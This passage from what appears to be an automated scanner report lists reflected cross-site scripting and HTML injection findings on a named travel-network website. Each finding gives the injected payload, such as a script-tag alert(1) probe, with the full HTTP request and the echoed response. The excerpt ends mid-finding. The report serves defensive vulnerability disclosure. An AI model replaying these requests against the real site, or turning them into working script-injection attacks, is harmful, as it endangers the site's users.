Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc38"><script>alert(1)</script>2a0520a8fd3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/imagesdbc38"><script>alert(1)</script>2a0520a8fd3/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621600; expires=Tue, 02-Oct-2012 01:00:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/imagesdbc38"><script>alert(1)</script>2a0520a8fd3/loadingAnimation.gif">
...[SNIP]...

4.396. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7abca<a>2fd76141046 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images7abca<a>2fd76141046/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621601; expires=Tue, 02-Oct-2012 01:00:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>2fd76141046">images7abca<a>2fd76141046</a>
...[SNIP]...

4.397. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 21c9a<a>d19b30c4205 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif21c9a<a>d19b30c4205 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621621; expires=Tue, 02-Oct-2012 01:00:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:22 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13602


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d19b30c4205">loadingAnimation.gif21c9a<a>d19b30c4205</a>
...[SNIP]...

4.398. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81ca"><a>0814390df40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gife81ca"><a>0814390df40 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621614; expires=Tue, 02-Oct-2012 01:00:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gife81ca"><a>0814390df40">
...[SNIP]...

4.399. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e274c<a>0900278d132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif?e274c<a>0900278d132=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621565; expires=Tue, 02-Oct-2012 00:59:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:25 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>0900278d132=1">loadingAnimation.gif?e274c<a>0900278d132=1</a>
...[SNIP]...

4.400. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26f8"><a>02159b53e67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif?e26f8"><a>02159b53e67=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621556; expires=Tue, 02-Oct-2012 00:59:16 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:16 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif?e26f8"><a>02159b53e67=1">
...[SNIP]...

4.401. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a570b"><a>4bb9c1a04b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/home-text.pnga570b"><a>4bb9c1a04b2 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618539; expires=Tue, 02-Oct-2012 00:08:59 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:59 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home-text.pnga570b"><a>4bb9c1a04b2">
...[SNIP]...

4.402. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77011<a>b692ba6deff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/home-text.png77011<a>b692ba6deff HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618544; expires=Tue, 02-Oct-2012 00:09:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:09:04 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>b692ba6deff">home-text.png77011<a>b692ba6deff</a>
...[SNIP]...

4.403. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc323<a>0d0d4ee86d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/home-text.png?fc323<a>0d0d4ee86d0=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618526; expires=Tue, 02-Oct-2012 00:08:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:46 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>0d0d4ee86d0=1">home-text.png?fc323<a>0d0d4ee86d0=1</a>
...[SNIP]...

4.404. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a52a3"><a>eb7230ea2d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

